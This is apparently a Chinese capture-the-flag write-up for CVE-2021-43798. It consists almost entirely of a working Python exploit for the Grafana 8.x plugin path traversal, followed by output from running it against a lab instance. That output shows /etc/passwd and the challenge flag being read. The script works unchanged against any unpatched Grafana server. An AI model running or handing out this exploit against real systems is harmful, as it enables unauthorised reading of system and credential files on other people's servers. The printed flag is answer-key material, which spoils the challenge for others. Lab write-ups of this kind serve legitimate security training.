0%

CVE-2021-43798 XcNGG的WriteUp

2024-01-10 04:00By
XcNGG
其他WEB靶机CVE-2021-43798任意文件读取

Problem: CVE-2021-43798

CVE-2021-43798

[[toc]]

POC

POC

# -*- coding: utf-8 -*-
"""Grafana8.x 任意文件读取"""
import urllib.request
import sys


def send_http(url):
    try:
        req = urllib.request.urlopen(url)
    except:
        print("Connection failed")
        req = None
    if req:
        if req.getcode() != 200:
            req = None
    return req


if __name__ == '__main__':
    if len(sys.argv) == 3:
        url = sys.argv[1]
        file = sys.argv[2]
        pluginIDs = ['cloudwatch', 'dashboard', 'elasticsearch', 'grafana', 'grafana-azure-monitor-datasource',
                     'graphite', 'influxdb', 'jaeger', 'loki', 'mixed', 'mssql', 'mysql', 'opentsdb', 'postgres',
                     'prometheus', 'tempo', 'testdata', 'zipkin', 'alertGroups', 'alertlist', 'annolist', 'barchart',
                     'bargauge', 'canvas', 'dashlist', 'debug', 'gauge', 'geomap', 'gettingstarted', 'graph', 'heatmap',
                     'histogram', 'live', 'logs', 'news', 'nodeGraph', 'piechart', 'pluginlist', 'stat',
                     'state-timeline', 'status-history', 'table', 'table-old', 'text', 'timeseries', 'welcome',
                     'xychart']
        for pluginID in pluginIDs:
            if url[-1] != '/':
                url = url + '/'
            url = url + "public/plugins/" + pluginID + "/../../../../../../../../.." + file
            req = send_http(url)
            if req:
                print("Exploit success\n")
                print(req.read().decode())
                print("payload: {0}".format(url))
                break
        else:
            print("Exploit failure\n")
    else:
        print("usage: CVE-2021-43798-poc.py http://127.0.0.1:3000 /etc/passwd")

使用示例

E:\Administrator\Downloads>python poc.py http://node5.anna.nssctf.cn:28272/ /etc/passwd
Exploit success

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:Linux User,,,:/home/grafana:/sbin/nologin

payload: http://node5.anna.nssctf.cn:28272/public/plugins/cloudwatch/../../../../../../../../../etc/passwd

-------------------------------------


E:\Administrator\Downloads>python poc.py http://node5.anna.nssctf.cn:28272/ /flag
Exploit success

NSSCTF{9cb639ad-ebfb-4476-9bbb-520e7cb02be1}

payload: http://node5.anna.nssctf.cn:28272/public/plugins/cloudwatch/../../../../../../../../../flag
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论
文章信息
板块实战
作者
XcNGG
目录导航